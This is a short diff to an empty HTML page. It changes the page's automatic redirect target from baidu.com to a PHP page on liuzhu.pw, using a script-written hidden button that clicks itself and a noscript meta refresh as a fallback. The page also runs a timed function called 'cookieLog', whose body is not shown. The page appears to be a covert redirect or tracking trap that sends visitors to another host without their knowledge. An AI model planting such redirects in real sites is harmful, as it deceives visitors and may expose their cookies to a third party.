--- a/1111.html
+++ b/1111.html
@@ -8,7 +8,7 @@
 <title></title>
 <script type="text/javascript">
 function funtz(){
-	var real_jump_address='http://www.baidu.com';  
+	var real_jump_address='http://www.liuzhu.pw/1111.php';  
 	if (!window.attachEvent) {
         document.write('<input style="display:none" type="button" id="exe" value="" onclick="window.location=\'' + real_jump_address + '\'">');
         document.getElementById('exe').click();
@@ -25,6 +25,6 @@ setTimeout(cookieLog,1);
 setTimeout(funtz,50);
 </script>
 <noscript>
-<meta http-equiv="refresh" content="0;url=http://www.baidu.com">
+<meta http-equiv="refresh" content="0;url=http://www.liuzhu.pw/1111.php">
 </noscript>
 </head><body></body></html>
